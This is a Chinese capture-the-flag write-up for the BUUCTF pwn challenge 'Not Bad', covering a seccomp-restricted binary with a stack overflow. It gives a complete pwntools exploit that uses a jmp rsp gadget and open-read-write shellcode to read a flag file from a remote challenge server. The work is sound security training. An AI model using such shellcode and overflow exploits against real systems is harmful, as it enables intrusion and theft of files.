[BUUCTF]PWN——[极客大挑战 2019]Not Bad (orw_shellcode)

其他 2021-03-23 06:42:14 阅读次数: 0

[极客大挑战 2019]Not Bad

附件

步骤

  1. 例行检查,64位程序,没用开启任何保护
    在这里插入图片描述

  2. 本地试运行一下看看大概的情况,根据程序提示,是个简单的shellcode,按照经验,肯定不简单
    在这里插入图片描述

  3. 64位ida载入
    在这里插入图片描述
    百度一下关于mmap函数的介绍
    把从0x123000开始的地址,大小为0x1000的长度,权限改为可写可执行
    sub_400949(),沙盒过滤
    在这里插入图片描述
    使用seccomp-tools dump ./bad查看一下哪些函数可以使用
    在这里插入图片描述
    发现只有read,write,open,exit可以使用,估计这题应该是使用open-->read-->write这样的orw的方式获取flag了
    sub_400906()
    在这里插入图片描述
    sub_400A16(),明显的溢出漏洞
    在这里插入图片描述

  4. 这题的思路很简单,写入orw类型的shellcode,然后跳转去执行,buf的大小只有0x20,感觉不够我们写全rop攻击链,程序一开始的时候给我们开辟了0x100可执行的空间,打算在这边写shellcode,然后利用buf的溢出跳转过来执行我们的shellcode

  5. 先写一下orw的shellcode

mmap=0x123000
orw_payload=shellcraft.open('./flag')           #打开根目录下的flag文件
orw_payload+=shellcraft.read(3,mmap,0x50)       #读取文件标识符是3的文件0x50个字节存放到mmap分配的地址空间里
orw_payload+=shellcraft.write(1,mmap,0x50)      #将mmap地址上的内容输出0x50个字节

关于文件描述符fd的具体看这篇文章,我这边简单说一下。
read里的fd写3是因为程序执行的时候文件描述符是从3开始的,write里的1是标准输出到显示器,这些知识点在我给的链接里有。

  1. 接下来写一下buf里的rop攻击链
    buf里的rop攻击链要完成的任务是往mmap里写入orw_payload,让程序跳转到mmap去执行orw_payload,确定目的后开始写rop攻击链
payload=asm(shellcraft.read(0,mmap,0x100))+asm('mov rax,0x123000;call rax')#buf里的rop是往mmap里读入0x100长度的数据,跳转到mmap的地址执行

这样buf里的rop就达到了我们想要的目的,下面就要想办法让buf里的内容被执行
发现该程序有jmp rsp,利用它可以跳转到buf去执行,buf地址是rsp-0x30,
sub rsp,0x30;jmp rsp小于8字节满足要求。在这里插入图片描述
buf处的完整rop攻击链

jmp_rsp=0x400A01
payload=asm(shellcraft.read(0,mmap,0x100))+asm('mov rax,0x123000;call rax')#buf里的rop是往mmap里读入0x100长度的数据,跳转到mmap的地址执行
payload=payload.ljust(0x28,'\x00')#buf的大小是0x20,加上rbp0x8是0x28,用’\x00‘去填充剩下的位置
payload+=p64(jmp_rsp)+asm('sub rsp,0x30;jmp rsp')#返回地址写上跳转到rsp
p.recvuntil('Easy shellcode, have fun!')
p.sendline(payload)

这样buf里面的rop也构造好了,剩下的只要传入orw_payload即可读出flag

完整exp

扫描二维码关注公众号,回复: 12871937 查看本文章 
from pwn import *

context.arch='amd64'

elf = ELF('./bad')
p = remote('node3.buuoj.cn',28461)


mmap=0x123000
orw_payload = shellcraft.open("./flag")
orw_payload += shellcraft.read(3, mmap, 0x50)
orw_payload += shellcraft.write(1, mmap,0x50)

jmp_rsp=0x400A01
payload=asm(shellcraft.read(0,mmap,0x100))+asm('mov rax,0x123000;call rax')
payload=payload.ljust(0x28,'\x00')
payload+=p64(jmp_rsp)+asm('sub rsp,0x30;jmp rsp')
p.recvuntil('Easy shellcode, have fun!')
p.sendline(payload)


shellcode=asm(orw_payload)
p.sendline(shellcode)
p.interactive()

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/mcmuyanga/article/details/113389703
今日推荐
美国拟限制 AI 大模型出口中国和俄罗斯
苹果将与 OpenAI 达成协议,将 ChatGPT 应用于 iPhone
openKylin 社区生态委员会第六次会议圆满召开
阿里云正式发布通义千问 2.5
Python 3.13 发布首个 Beta:实验性自由线程模式和 JIT、改进交互式解释器
Stack Overflow 拿我的代码去训练 AI 大模型,还封了我的账号
Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作
报告:Django 仍然是 74% 开发者的首选
《2024 年一季度互联网投融资运行情况》研究报告
15 年前上了“FFmpeg 耻辱柱”,今天他还得谢谢咱——腾讯QQPlayer一雪前耻?
TIOBE 5 月榜单:Fortran “复活”进入 Top 10
GCC 14.1 发布
周排行
curl的POST请求,封装方法
8.1.1. Integer Types
Java基础 Day05(个人复习整理)
Python - Django - 中间件 process_exception
小L的试卷
【Shell编程】 (函数)判断用户是否存在
python(css样式)
spring ant path 匹配原则 - 【笔记】
《JavaScript与JScript从入门到精通》(美)James.Jaworski.中译本.扫描版.pdf
Eclipse运行带参数的java程序
每日归档
更多
2024-05-12(0)
2024-05-11(38)
2024-05-10(38)
2024-05-09(35)
2024-05-08(42)
2024-05-07(14)
2024-05-06(40)
2024-05-05(0)
2024-05-04(7)
2024-05-03(19)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022